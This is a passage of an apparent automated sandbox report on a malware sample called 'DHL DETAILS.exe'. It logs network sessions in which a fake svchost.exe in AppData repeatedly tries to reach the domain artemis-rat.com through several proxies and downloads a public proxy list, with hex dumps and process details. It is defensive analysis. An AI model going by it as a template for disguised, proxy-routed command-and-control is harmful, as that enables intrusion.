2024-03-09 12:14:36 UTC	1370	IN	Data Raw: 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 37 32 63 39 66 62 64 65 35 61 64 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78 Data Ascii: ert_index_js-72c9fbde5ad4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index
2024-03-09 12:14:36 UTC	1370	IN	Data Raw: 62 5f 62 65 68 61 76 69 6f 72 73 5f 69 6e 63 6c 75 64 65 2d 34 36 37 37 35 34 2d 66 39 62 64 34 33 33 65 39 35 39 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f Data Ascii: b_behaviors_include-467754-f9bd433e9591.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	63279	172.67.140.87	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-09 12:14:44 UTC	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
2024-03-09 12:14:44 UTC	161	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:44 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: -
2024-03-09 12:14:44 UTC	155	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	63403	140.82.113.3	443	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-09 12:14:46 UTC	101	OUT	GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1 Host: github.com Connection: Keep-Alive
2024-03-09 12:14:46 UTC	506	IN	HTTP/1.1 200 OK Server: GitHub.com Date: Sat, 09 Mar 2024 12:14:36 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With ETag: W/"736507163a5fb79617a9c43dc0d243c4" Cache-Control: max-age=0, private, must-revalidate Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2024-03-09 12:14:46 UTC	3604	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
2024-03-09 12:14:46 UTC	21	IN	Data Raw: 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: connection: close
2024-03-09 12:14:46 UTC	1370	IN	Data Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
2024-03-09 12:14:46 UTC	1370	IN	Data Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
2024-03-09 12:14:46 UTC	1370	IN	Data Raw: 67 69 74 68 75 62 2d 66 34 64 38 35 37 63 62 63 39 36 61 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 Data Ascii: github-f4d857cbc96a.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
2024-03-09 12:14:46 UTC	1370	IN	Data Raw: 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 Data Ascii: ps://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://gi
2024-03-09 12:14:46 UTC	1370	IN	Data Raw: 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 2d 62 63 38 66 30 32 62 39 36 37 34 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 Data Ascii: " defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer
2024-03-09 12:14:46 UTC	1370	IN	Data Raw: 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 33 33 38 66 62 37 63 34 37 65 37 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f Data Ascii: fer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-338fb7c47e7c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendo
2024-03-09 12:14:46 UTC	1370	IN	Data Raw: 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 37 32 63 39 66 62 64 65 35 61 64 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78 Data Ascii: ert_index_js-72c9fbde5ad4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index
2024-03-09 12:14:46 UTC	1370	IN	Data Raw: 62 5f 62 65 68 61 76 69 6f 72 73 5f 69 6e 63 6c 75 64 65 2d 34 36 37 37 35 34 2d 66 39 62 64 34 33 33 65 39 35 39 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f Data Ascii: b_behaviors_include-467754-f9bd433e9591.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49207	222.255.238.159	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-09 12:14:51 UTC	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
2024-03-09 12:14:51 UTC	192	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 613 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-03-09 12:14:51 UTC	613	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49301	102.223.20.217	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-09 12:14:51 UTC	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
2024-03-09 12:14:52 UTC	192	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:52 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 613 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-03-09 12:14:52 UTC	613	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	56165	172.67.140.87	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-09 12:14:55 UTC	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
2024-03-09 12:14:56 UTC	161	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:56 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: -
2024-03-09 12:14:56 UTC	155	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	62819	222.255.238.159	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-09 12:15:05 UTC	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
2024-03-09 12:15:06 UTC	192	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:15:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 613 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-03-09 12:15:06 UTC	613	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	63576	102.223.20.217	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-09 12:15:07 UTC	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
2024-03-09 12:15:08 UTC	192	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:15:08 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 613 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-03-09 12:15:08 UTC	613	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<

Target ID:	0
Start time:	13:14:06
Start date:	09/03/2024
Path:	C:\Users\user\Desktop\DHL DETAILS.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\DHL DETAILS.exe
Imagebase:	0x28f61f60000
File size:	40'960 bytes
MD5 hash:	0603858E620614E6BADC889156F4F868
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:14:07
Start date:	09/03/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
